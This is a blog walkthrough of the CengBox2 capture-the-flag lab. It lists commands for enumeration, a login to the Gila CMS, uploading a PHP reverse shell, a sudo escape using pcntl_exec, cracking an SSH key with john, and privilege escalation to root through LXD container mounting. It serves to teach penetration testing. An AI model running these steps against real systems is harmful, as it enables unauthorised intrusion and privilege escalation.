CengBox2 Walkthrough

Start by scanning the box with nmap –A –T4 –p- –vv

We can see that we can login with FTP service as anonymous login and there is a file note.txt we can download:

We used anonymous:anonymous to log and download the text file with “get note.txt”

OK now there is some sort of Panel we don’t know which kind, i modified the /etc/hosts and added ceng-company.vm to it.

I used wfuzz as i don’t know the name of the Panel, first i used it as ceng-company.vm/FUZZ but i didn’t find anything, then i used it as FUZZ.ceng-company.vm and it came back with a result:

wfuzz -c -w /usr/share/wfuzz/wordlist/general/big.txt –hc 200,404,400 -H ‘Host: FUZZ.ceng-company.vm’ -u http://ceng-company.vm

I used the options hc 200 because it came back with a false positives.

Now change the /etc/hosts to admin.ceng-company.vm

Let’s use dirbuster because i couldn’t use dirb came with errors:

We got our Panel it’s Gila:

Now we login with kevin email and password, so the email is kevin@ceng-company.vm and the password is admin:

And we logged in with these credentials.

Now we upload a shell to the box, go to the side menu > Content > File Manager and in the tmp folder upload a shell file:

Open the .htaccess file and change the word “deny” to “allow” and save it

Then navigate to http://admin.ceng-company.vm/gila/tmp/shell.php to get a reverse shell back:

In home directory there are two users mitnick and Swartz, only Swartz is accessible:

The file runphp.sh is executable, and also the user www-data can run sudo:

sudo -u swartz /home/swartz/runphp.sh

pcntl_exec(‘/bin/sh’, [‘-p’]);you can find this HERE

We can now access the other user mitnick home directory and we can view hi ssh keys, which we can crack it with john.

Follow these steps:

First copy the output of the file id_rsa to new file and name it keys.txt

locate ssh2john.py

cp /usr/share/john/ssh2john.py ~

python ssh2john.py keys.txt > keys.hash

john –wordlist=/root/pass/rockyou.txt keys.hash

The password is legend and the username is mitnick, so let’s ssh to the box using these credentials, and don’t forget to change the file permission “chmod 600 keys.txt”:

Now the user mitnick is part of lxd group, so we’re going to use “LXD Alpine Linux image builder” on our machine first then transfer the file to the target box with these steps:

On our machine:

sudo ./build-alpine

sudo ./build-alpine -h

Then on the host machine we run this:

lxc image import ./apline-v3.10-x86_64-20191008_1227.tar.gz –alias image

lxc image list

lxc init image hacker -c security.privileged=true

lxc config device add hacker mydevice disk source=/ path=/mnt/root recursive=true

lxc start hacker

lxc exec hacker /bin/sh

Now the root directory will be mounted in /mnt/root/root then we catch the flag from there:

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s